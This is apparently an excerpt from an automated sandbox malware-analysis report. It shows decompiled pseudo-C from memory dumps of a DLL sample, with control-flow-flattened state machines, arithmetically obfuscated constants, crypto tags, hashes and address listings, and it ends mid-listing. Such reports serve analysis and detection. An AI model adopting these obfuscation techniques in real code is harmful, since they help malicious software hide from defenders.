0x02b4db0d
0x02b4daf0
0x02b4daec
0x02b4dae4
0x02b4dad8
0x02b4dbb2
0x02b4dbb4
0x02b4dbb9
0x02b4dbb9
0x02b4dbc0
0x02b4dbc0
0x02b4db7c
0x02b4db81
0x02b4db81
0x02b4db84
0x02b4db87
0x02b4db87
0x02b4db87
0x00000000

Strings

m~`, xrefs: 02B4D991
(2, xrefs: 02B4DA8A
)-, xrefs: 02B4DA04

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )-$(2$m~`
API String ID: 0-2018184401
Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction ID: 04d94652c75693ee454da7b8b471b4b6ea42304076e370775953941447c899bb
Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction Fuzzy Hash: BB7145B28083429FC354DF25D58945BBBF0FB88358F004A5DF59A96220E7B1DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 02B49774, Relevance: 3.9, Strings: 3, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E02B49774(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _t119;
				intOrPtr _t132;
				void* _t134;
				void* _t139;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				void* _t158;
				signed int* _t161;

				_push(_a24);
				_push(_a20);
				_push(1);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t119);
				_v16 = 0xc48506;
				_t161 =  &(( &_v52)[8]);
				_v16 = _v16 + 0xffffac5b;
				_v16 = _v16 ^ 0x00c0af73;
				_t158 = 0;
				_v36 = 0x37ec46;
				_t139 = 0x2fa1272;
				_t11 =  &_v36; // 0x37ec46
				_t154 = 0xf;
				_v36 =  *_t11 / _t154;
				_t155 = 0x17;
				_v36 = _v36 * 0x4d;
				_v36 = _v36 ^ 0x011f94eb;
				_v48 = 0x1c9307;
				_v48 = _v48 + 0xffff180a;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0x45e7;
				_v48 = _v48 ^ 0x000c030c;
				_v20 = 0x2c1c35;
				_v20 = _v20 * 0x1a;
				_v20 = _v20 ^ 0x04724ae3;
				_v52 = 0xfea2f7;
				_v52 = _v52 + 0xffffcd03;
				_v52 = _v52 << 0xf;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0374764b;
				_v24 = 0x4bca1;
				_v24 = _v24 + 0xffff92f8;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0004173d;
				_v28 = 0xca25f8;
				_v28 = _v28 ^ 0xf07fe4f1;
				_v28 = _v28 | 0xda5170b9;
				_v28 = _v28 ^ 0xfaf3c539;
				_v40 = 0x557f86;
				_v40 = _v40 / _t155;
				_v40 = _v40 | 0x36ce95b0;
				_v40 = _v40 + 0xffff3f34;
				_v40 = _v40 ^ 0x36c02d15;
				_v44 = 0x3d6d99;
				_t156 = 0x16;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x3bf21f86;
				_v32 = 0x4fb69d;
				_v32 = _v32 << 4;
				_v32 = _v32 / _t156;
				_v32 = _v32 ^ 0x00344331;
				_v8 = 0x9d9959;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000ae1f8;
				_v12 = 0x98829;
				_v12 = _v12 ^ 0xb9c9dda7;
				_v12 = _v12 ^ 0xb9cd803a;
				_t157 = _v4;
				do {
					while(_t139 != 0x2fa1272) {
						if(_t139 == 0x306b7e5) {
							E02B3F9C1(_v4, _v24, _v28, _v40, 1, _a24, 1, _a20, _t139, _v44, _v32);
							_t161 =  &(_t161[9]);
							_t139 = 0xc6d7030;
							_t158 =  !=  ? 1 : _t158;
							continue;
						} else {
							if(_t139 == 0x66d181a) {
								_t132 = E02B4BC6B();
								_t157 = _t132;
								if(_t132 != 0xffffffff) {
									_t139 = 0xc4ce558;
									continue;
								}
							} else {
								if(_t139 == 0xc4ce558) {
									_t134 = E02B372C4(_v36,  &_v4, _v48, _v20, _t157, _v52);
									_t161 =  &(_t161[4]);
									if(_t134 != 0) {
										_t139 = 0x306b7e5;
										continue;
									}
								} else {
									if(_t139 != 0xc6d7030) {
										goto L14;
									} else {
										E02B51538(_v8, _v12, _v4);
									}
								}
							}
						}
						L7:
						return _t158;
					}
					_t139 = 0x66d181a;
					L14:
				} while (_t139 != 0xa576bfc);
				goto L7;
			}

0x02b4977b
0x02b49781
0x02b49786
0x02b49787
0x02b4978b
0x02b4978c
0x02b49790
0x02b49791
0x02b49792
0x02b49797
0x02b4979f
0x02b497a2
0x02b497ac
0x02b497b4
0x02b497b6
0x02b497be
0x02b497c3
0x02b497c9
0x02b497ce
0x02b497d9
0x02b497dc
0x02b497e0
0x02b497e8
0x02b497f0
0x02b497f8
0x02b497fd
0x02b49805
0x02b4980d
0x02b4981a
0x02b4981e
0x02b49826
0x02b4982e
0x02b49836
0x02b4983b
0x02b49840
0x02b49848
0x02b49850
0x02b49858
0x02b4985d
0x02b49865
0x02b4986d
0x02b49875
0x02b4987d
0x02b49885
0x02b49895
0x02b49899
0x02b498a1
0x02b498a9
0x02b498b1
0x02b498be
0x02b498bf
0x02b498c3
0x02b498c8
0x02b498cd
0x02b498d5
0x02b498dd
0x02b498e8
0x02b498ec
0x02b498f4
0x02b498fc
0x02b49901
0x02b49909
0x02b49916
0x02b4991e
0x02b49926
0x02b4992a
0x02b4992a
0x02b49938
0x02b499d4
0x02b499d9
0x02b499dc
0x02b499e3
0x00000000
0x02b4993a
0x02b49940
0x02b4999b
0x02b499a0
0x02b499a5
0x02b499a7
0x00000000
0x02b499a7
0x02b49942
0x02b49948
0x02b49987
0x02b4998c
0x02b49991
0x02b49993
0x00000000
0x02b49993
0x02b4994a
0x02b49950
0x00000000
0x02b49956
0x02b49962
0x02b49967
0x02b49950
0x02b49948
0x02b49940
0x02b49969
0x02b49971
0x02b49971
0x02b499eb
0x02b499f0
0x02b499f0
0x00000000

Strings

E, xrefs: 02B497FD
1C4, xrefs: 02B498EC
F7, xrefs: 02B497C3

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1C4$F7$E
API String ID: 0-3303878784
Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction ID: 3467dd8c9a881baaa497bb07271d4e30139f6fa241d138fbc79a37f8311ddcaa
Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction Fuzzy Hash: 975142B2109381AFC358CE25D98981FBBE5FBD8748F405A1DF29696260D770CA09DF87

Uniqueness

Uniqueness Score: -1.00%

Function 02B3B820, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02B3B820(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t192;
				intOrPtr* _t193;
				intOrPtr _t194;
				signed int* _t196;

				_t196 =  &_v68;
				_v16 = 0xd87d65;
				_v12 = 0x358b32;
				_v8 = 0xe06945;
				_t192 =  *0x2b56210; // 0x0
				_v4 = 0;
				_t162 = __ecx;
				_v68 = 0xf23e36;
				_t193 = _t192 + 0x210;
				_v68 = _v68 ^ 0x9abe7b4c;
				_t164 = 0x28;
				_v68 = _v68 / _t164;
				_v68 = _v68 + 0xffff9758;
				_v68 = _v68 ^ 0x03db1914;
				_v28 = 0x153966;
				_v28 = _v28 + 0xc98d;
				_v28 = _v28 ^ 0x00189a49;
				_v32 = 0x66a403;
				_v32 = _v32 + 0x4aa1;
				_v32 = _v32 ^ 0x006148cf;
				_v44 = 0xfe7e73;
				_v44 = _v44 + 0xffff9639;
				_v44 = _v44 | 0x437ec796;
				_v44 = _v44 ^ 0x43f7a292;
				_v48 = 0x44000d;
				_t165 = 0x26;
				_v48 = _v48 / _t165;
				_v48 = _v48 | 0x123d3176;
				_v48 = _v48 ^ 0x1230a07a;
				_v60 = 0x1c671b;
				_v60 = _v60 | 0x089dc1d7;
				_t166 = 0x64;
				_v60 = _v60 / _t166;
				_t167 = 0x5e;
				_v60 = _v60 * 0x62;
				_v60 = _v60 ^ 0x087e3283;
				_v24 = 0x917945;
				_v24 = _v24 ^ 0x5fcd23bd;
				_v24 = _v24 ^ 0x5f54fdfa;
				_v64 = 0xfb1c79;
				_v64 = _v64 ^ 0x3af08dd4;
				_v64 = _v64 + 0x24a6;
				_v64 = _v64 + 0xffffe057;
				_v64 = _v64 ^ 0x3a029534;
				_v36 = 0xae1548;
				_v36 = _v36 * 0x1a;
				_v36 = _v36 + 0x68c6;
				_v36 = _v36 ^ 0x11a48673;
				_v40 = 0xac750c;
				_v40 = _v40 ^ 0x67c11f84;
				_v40 = _v40 | 0x960dc624;
				_v40 = _v40 ^ 0xf7630ea5;
				_v52 = 0x5bbbfa;
				_v52 = _v52 / _t167;
				_v52 = _v52 + 0xc5b0;
				_v52 = _v52 ^ 0x922587b4;
				_v52 = _v52 ^ 0x922f6435;
				_v56 = 0xb91e06;
				_t168 = 0x13;
				_v56 = _v56 / _t168;
				_v56 = _v56 + 0x7f58;
				_v56 = _v56 << 2;
				_v56 = _v56 ^ 0x002d76eb;
				_v20 = 0xce5e52;
				_t169 = 0x56;
				_v20 = _v20 / _t169;
				_v20 = _v20 ^ 0x000b3737;
				while(1) {
					_t194 =  *_t193;
					if(_t194 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
						L4:
						 *_t193 =  *((intOrPtr*)(_t194 + 0x24));
						_t158 = E02B52B09(_v52, _t194, _v56, _v20);
					} else {
						_t158 = E02B51028(_v28, _v32,  *((intOrPtr*)(_t194 + 0x48)), _t162, _v44, _v48);
						_t196 =  &(_t196[4]);
						if(_t158 != _v68) {
							_t193 = _t194 + 0x24;
						} else {
							 *((intOrPtr*)(_t194 + 0x2c))( *((intOrPtr*)(_t194 + 0x38)), 0, 0);
							E02B3F0E9(_v72,  *((intOrPtr*)(_t194 + 0x38)), _v36, _v76);
							E02B51538(_v48, _v52,  *((intOrPtr*)(_t194 + 0x48)));
							_t196 =  &(_t196[3]);
							goto L4;
						}
					}
				}
				return _t158;
			}

0x02b3b820
0x02b3b823
0x02b3b82d
0x02b3b835
0x02b3b841
0x02b3b849
0x02b3b84d
0x02b3b84f
0x02b3b857
0x02b3b85d
0x02b3b86b
0x02b3b870
0x02b3b876
0x02b3b87e
0x02b3b886
0x02b3b88e
0x02b3b896
0x02b3b89e
0x02b3b8a6
0x02b3b8ae
0x02b3b8b6
0x02b3b8be
0x02b3b8c6
0x02b3b8ce
0x02b3b8d6
0x02b3b8e2
0x02b3b8e7
0x02b3b8ed
0x02b3b8f5
0x02b3b8fd
0x02b3b905
0x02b3b911
0x02b3b916
0x02b3b921
0x02b3b922
0x02b3b926
0x02b3b92e
0x02b3b936
0x02b3b93e
0x02b3b946
0x02b3b94e
0x02b3b956
0x02b3b95e
0x02b3b966
0x02b3b96e
0x02b3b97b
0x02b3b97f
0x02b3b987
0x02b3b98f
0x02b3b997
0x02b3b99f
0x02b3b9a7
0x02b3b9af
0x02b3b9bd
0x02b3b9c1
0x02b3b9c9
0x02b3b9d1
0x02b3b9d9
0x02b3b9e9
0x02b3b9ee
0x02b3b9f4
0x02b3b9fc
0x02b3ba01
0x02b3ba09
0x02b3ba15
0x02b3ba18
0x02b3ba1c
0x02b3ba96
0x02b3ba96
0x02b3ba9a
0x00000000
0x00000000
0x02b3ba29
0x02b3ba7c
0x02b3ba8d
0x02b3ba8f
0x02b3ba2b
0x02b3ba3f
0x02b3ba44
0x02b3ba4b
0x02b3baa4
0x02b3ba4d
0x02b3ba52
0x02b3ba64
0x02b3ba74
0x02b3ba79
0x00000000
0x02b3ba79
0x02b3ba4b
0x02b3ba29
0x02b3baa3

Strings

v-, xrefs: 02B3BA01
$P, xrefs: 02B3B83F
Ei, xrefs: 02B3B835

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$Ei$v-
API String ID: 0-1888193988
Opcode ID: 3db5cc8138390a02815f8af594a938f4198833b6bc177adb6e485adbabc3c4ec
Instruction ID: f058dfe508f52f7256a3cc30d3f09df2148875cc5aac34edc0b71905cd9575ef
Opcode Fuzzy Hash: 3db5cc8138390a02815f8af594a938f4198833b6bc177adb6e485adbabc3c4ec
Instruction Fuzzy Hash: 1E6134B15083809FD394CF25D48990BBBF2FBC8718F408A1DF1DA66260D7B59A1ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 02B507AA, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E02B507AA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t127;
				void* _t143;
				void* _t147;
				intOrPtr _t159;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;

				_t145 = _a12;
				_t164 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02B4FE29(_t127);
				_v68 = 0xce0704;
				_t172 =  &(( &_v80)[5]);
				_t165 = 0;
				_t147 = 0xeb10c15;
				_push("true");
				_pop(_t166);
				_v68 = _v68 / _t166;
				_v68 = _v68 ^ 0x27d6a24c;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x13812000;
				_v56 = 0x3987d6;
				_v56 = _v56 + 0xffffa396;
				_v56 = _v56 << 6;
				_v56 = _v56 + 0xffffda2f;
				_v56 = _v56 ^ 0x0e4ab52f;
				_v76 = 0xda5b69;
				_v76 = _v76 + 0xffffc444;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xf293bfd0;
				_v76 = _v76 ^ 0xf29c223d;
				_v80 = 0x3698bd;
				_v80 = _v80 << 2;
				_v80 = _v80 + 0xffffb830;
				_v80 = _v80 | 0x7cee6fd8;
				_v80 = _v80 ^ 0x7cfe3832;
				_v44 = 0x3a6f25;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000731a8;
				_v48 = 0xdbe73e;
				_v48 = _v48 | 0x7450ea9d;
				_v48 = _v48 ^ 0x74de2fdf;
				_v36 = 0x16da79;
				_t167 = 0x12;
				_v36 = _v36 * 0x5d;
				_v36 = _v36 ^ 0x084db146;
				_v60 = 0xec6235;
				_v60 = _v60 + 0x184b;
				_v60 = _v60 / _t167;
				_v60 = _v60 | 0x0c30d5fb;
				_v60 = _v60 ^ 0x0c38efee;
				_v64 = 0x38c801;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0xc825be84;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0x000d1c3b;
				_v72 = 0xe77e6e;
				_v72 = _v72 + 0xffffb3b2;
				_v72 = _v72 << 0xd;
				_t168 = 0x78;
				_v72 = _v72 / _t168;
				_v72 = _v72 ^ 0x01e31a81;
				_v40 = 0x7e766a;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x12c7afcd;
				_v52 = 0xe103b8;
				_t169 = 0x4e;
				_v52 = _v52 / _t169;
				_v52 = _v52 + 0xffff4b52;
				_v52 = _v52 ^ 0x000d8548;
				do {
					while(_t147 != 0x8d72c38) {
						if(_t147 == 0xc75b0cb) {
							_t143 = E02B357B8( *_t164, _v76, _v80,  *((intOrPtr*)(_t164 + 4)), _v44,  &_v32, _v48);
							_t172 =  &(_t172[6]);
							if(_t143 != 0) {
								_t147 = 0x8d72c38;
								continue;
							}
						} else {
							if(_t147 != 0xeb10c15) {
								goto L8;
							} else {
								_t147 = 0xc75b0cb;
								continue;
							}
						}
						goto L9;
					}
					_t159 =  *0x2b56224; // 0x0
					E02B54D53( *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t159 + 0x48)), _v36, _t147,  &_v32, _v60, _v64, _v68, _v72, _v40, _t147,  *_t145, _v52);
					_t172 =  &(_t172[0xb]);
					_t147 = 0x3b36d39;
					_t165 =  ==  ? 1 : _t165;
					L8:
				} while (_t147 != 0x3b36d39);
				L9:
				return _t165;
			}

0x02b507ae
0x02b507b5
0x02b507b9
0x02b507ba
0x02b507be
0x02b507bf
0x02b507c1
0x02b507c6
0x02b507ce
0x02b507d7
0x02b507d9
0x02b507de
0x02b507e0
0x02b507e5
0x02b507eb
0x02b507f3
0x02b507f8
0x02b50800
0x02b50808
0x02b50810
0x02b50815
0x02b5081d
0x02b50825
0x02b5082d
0x02b50835
0x02b5083a
0x02b50842
0x02b5084a
0x02b50852
0x02b50857
0x02b5085f
0x02b50867
0x02b5086f
0x02b50877
0x02b5087c
0x02b50884
0x02b5088c
0x02b50894
0x02b5089c
0x02b508a9
0x02b508ac
0x02b508b0
0x02b508b8
0x02b508c0
0x02b508d0
0x02b508d4
0x02b508dc
0x02b508e4
0x02b508ec
0x02b508f1
0x02b508f9
0x02b508fe
0x02b50906
0x02b5090e
0x02b50916
0x02b5091f
0x02b50922
0x02b50926
0x02b5092e
0x02b5093b
0x02b5093f
0x02b50947
0x02b50957
0x02b5095f
0x02b50963
0x02b5096b
0x02b50973
0x02b50973
0x02b5097d
0x02b509a8
0x02b509ad
0x02b509b2
0x02b509b4
0x00000000
0x02b509b4
0x02b5097f
0x02b50985
0x00000000
0x02b50987
0x02b50987
0x00000000
0x02b50987
0x02b50985
0x00000000
0x02b5097d
0x02b509dd
0x02b509e9
0x02b509f7
0x02b509fc
0x02b50a01
0x02b50a04
0x02b50a04
0x02b50a11
0x02b50a19

Strings

5b, xrefs: 02B508B8
n~, xrefs: 02B50906
jv~, xrefs: 02B5092E

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5b$jv~$n~
API String ID: 0-1119068381
Opcode ID: e020d68be5d7312de9a1abc0459534f80742914df20626a80cf832405ffed9b7
Instruction ID: bb3caff34fb05a5e38c11e63e0ed7d2a1c7e51c2cad9a807412de4b72558abf6
Opcode Fuzzy Hash: e020d68be5d7312de9a1abc0459534f80742914df20626a80cf832405ffed9b7
Instruction Fuzzy Hash: 215166724083059FC748DF25C98991FBBE1FBD8758F908A1DF6966A220C371CA89CF46

Uniqueness

Uniqueness Score: -1.00%

Function 02B47A0F, Relevance: 3.9, Strings: 3, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E02B47A0F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				char _v596;
				void* _t147;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t147);
				_v72 = _v72 & 0x00000000;
				_v68 = _v68 & 0x00000000;
				_v76 = 0xac6bc1;
				_v48 = 0x918367;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x000cf094;
				_v36 = 0xe92c2d;
				_v36 = _v36 ^ 0xfac2eab7;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0xe346c7b1;
				_v64 = 0xc08572;
				_t170 = 0x1e;
				_v64 = _v64 / _t170;
				_v64 = _v64 ^ 0x00015c03;
				_v12 = 0x9212d2;
				_t171 = 0x1d;
				_v12 = _v12 * 0x39;
				_v12 = _v12 + 0x3383;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x08263998;
				_v32 = 0xc20336;
				_v32 = _v32 * 0x70;
				_v32 = _v32 ^ 0x74671eb1;
				_v32 = _v32 ^ 0x2084f54c;
				_v40 = 0xa9787c;
				_v40 = _v40 ^ 0x381c5a49;
				_v40 = _v40 | 0x64fc5a0b;
				_v40 = _v40 ^ 0x7cf9cebd;
				_v20 = 0x646c84;
				_v20 = _v20 * 0xa;
				_v20 = _v20 ^ 0x10bf9a9f;
				_v20 = _v20 ^ 0x793d42f9;
				_v20 = _v20 ^ 0x6a6515eb;
				_v60 = 0xc09cf0;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x813cbcc6;
				_v8 = 0xc99b6c;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff7686;
				_v8 = _v8 ^ 0x08dcc16a;
				_v8 = _v8 ^ 0x1531615b;
				_v44 = 0x17c218;
				_v44 = _v44 | 0xd7791395;
				_v44 = _v44 + 0xde66;
				_v44 = _v44 ^ 0xd7809290;
				_v28 = 0x8f3b5f;
				_v28 = _v28 >> 0xb;
				_v28 = _v28 * 0x5e;
				_v28 = _v28 ^ 0x00039abd;
				_v56 = 0xe3e33c;
				_v56 = _v56 * 0x69;
				_v56 = _v56 ^ 0x5d7c15ff;
				_v52 = 0x7e8124;
				_v52 = _v52 + 0xc0d9;
				_v52 = _v52 ^ 0x007e7944;
				_v24 = 0x2edb0b;
				_v24 = _v24 / _t171;
				_t172 = 0x3a;
				_v24 = _v24 / _t172;
				_t173 = 0x6f;
				_v24 = _v24 / _t173;
				_v24 = _v24 ^ 0x00044e1b;
				_v16 = 0xd6e45b;
				_v16 = _v16 * 0x6a;
				_v16 = _v16 | 0xc518fde9;
				_v16 = _v16 + 0xffff1d23;
				_v16 = _v16 ^ 0xddf5a256;
				_push(_v12);
				_push(_v64);
				_push(_v36);
				E02B42C9C(_v40, _v16, E02B4E1F8(0x2b3170c, _v48, _v16),  &_v596, 0x2b3170c, _v20, __edx);
				E02B4FECB(_t164, _v60, _v8, _v44, _v28);
				return E02B3D061( &_v596, _v56, _v52, _v24, _v16);
			}

0x02b47a1a
0x02b47a1f
0x02b47a22
0x02b47a25
0x02b47a26
0x02b47a27
0x02b47a2c
0x02b47a32
0x02b47a36
0x02b47a3d
0x02b47a44
0x02b47a48
0x02b47a4f
0x02b47a56
0x02b47a5d
0x02b47a61
0x02b47a68
0x02b47a74
0x02b47a79
0x02b47a7e
0x02b47a85
0x02b47a90
0x02b47a91
0x02b47a94
0x02b47a9b
0x02b47a9f
0x02b47aa6
0x02b47ab1
0x02b47ab4
0x02b47abb
0x02b47ac2
0x02b47ac9
0x02b47ad0
0x02b47ad7
0x02b47ade
0x02b47ae9
0x02b47aec
0x02b47af3
0x02b47afa
0x02b47b01
0x02b47b08
0x02b47b0c
0x02b47b13
0x02b47b1e
0x02b47b21
0x02b47b28
0x02b47b2f
0x02b47b36
0x02b47b3d
0x02b47b44
0x02b47b4b
0x02b47b52
0x02b47b59
0x02b47b61
0x02b47b64
0x02b47b6b
0x02b47b76
0x02b47b79
0x02b47b80
0x02b47b87
0x02b47b8e
0x02b47b95
0x02b47ba1
0x02b47ba9
0x02b47bb0
0x02b47bb8
0x02b47bc0
0x02b47bc3
0x02b47bca
0x02b47bd5
0x02b47bd8
0x02b47bdf
0x02b47be6
0x02b47bed
0x02b47bf0
0x02b47bf3
0x02b47c16
0x02b47c29
0x02b47c4d

Strings

-,, xrefs: 02B47A4F
<, xrefs: 02B47B6B
Dy~, xrefs: 02B47B8E

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -,$<$Dy~
API String ID: 0-1106285139
Opcode ID: 4aaa60575e203cd2a1775817041cf267fe44f03672b2446c5b8bfd20577eddd5
Instruction ID: 1c314da4b214bb6c0b8cc93a624e79b504e3231e1fe5e608d3c13d12754a94b3
Opcode Fuzzy Hash: 4aaa60575e203cd2a1775817041cf267fe44f03672b2446c5b8bfd20577eddd5
Instruction Fuzzy Hash: F261EFB1C0120DEBCF08CFE5E98A9EEBBB2FB48314F208149E111B6260D7B54A55DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02B37442, Relevance: 3.9, Strings: 3, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E02B37442(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _t68;
				intOrPtr _t81;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t105;
				intOrPtr* _t106;
				void* _t107;
				signed int* _t111;

				_push(_a16);
				_t106 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02B4FE29(_t68);
				_v24 = 0x62b98c;
				_t111 =  &(( &_v28)[6]);
				_t107 = 0;
				_t91 = 0x56d49db;
				_t87 = 0x32;
				_v24 = _v24 * 0x4b;
				_v24 = _v24 / _t87;
				_v24 = _v24 + 0xffff2f8c;
				_v24 = _v24 ^ 0x009a9eb5;
				_v16 = 0xcd53e2;
				_t88 = 0x3a;
				_v16 = _v16 * 0x65;
				_v16 = _v16 + 0xffffa8ae;
				_v16 = _v16 ^ 0x510428a2;
				_v28 = 0xd5f3ee;
				_v28 = _v28 ^ 0x77e73800;
				_v28 = _v28 / _t88;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0000e246;
				_v20 = 0x9cb423;
				_v20 = _v20 + 0x5dad;
				_v20 = _v20 ^ 0xe88d7dca;
				_v20 = _v20 ^ 0xe81c7203;
				_v4 = 0x5f6be5;
				_t46 =  &_v4; // 0x5f6be5
				_v4 =  *_t46 * 0x5c;
				_v4 = _v4 ^ 0x224497bb;
				_v8 = 0xac6149;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x0020023e;
				_v12 = 0x405ac1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000eeb29;
				do {
					while(_t91 != 0x56d49db) {
						if(_t91 == 0x845f35b) {
							_t82 = E02B40F86(_t106);
							asm("sbb ecx, ecx");
							_t91 = ( ~_t82 & 0xfe625aa0) + 0xd9296b1;
							continue;
						} else {
							if(_t91 == 0xbb8a3c5) {
								E02B40D04();
								_t91 = 0xd9296b1;
								continue;
							} else {
								if(_t91 == 0xbf4f151) {
									if(E02B48FAE(_a4) != 0) {
										_t107 = 1;
									} else {
										_t91 = 0xbb8a3c5;
										continue;
									}
								} else {
									if(_t91 != 0xd9296b1) {
										goto L12;
									} else {
										_t105 =  *0x2b56224; // 0x0
										E02B52B09(_v4, _t105, _v8, _v12);
									}
								}
							}
						}
						L15:
						return _t107;
					}
					_push(_t91);
					_push(_t91);
					_t81 = E02B3C5D8(0x64);
					_t111 =  &(_t111[3]);
					 *0x2b56224 = _t81;
					_t91 = 0x845f35b;
					L12:
				} while (_t91 != 0xd85fda5);
				goto L15;
			}

0x02b37449
0x02b3744d
0x02b3744f
0x02b37453
0x02b37457
0x02b3745c
0x02b3745d
0x02b37462
0x02b3746a
0x02b37474
0x02b37476
0x02b37482
0x02b37483
0x02b3748f
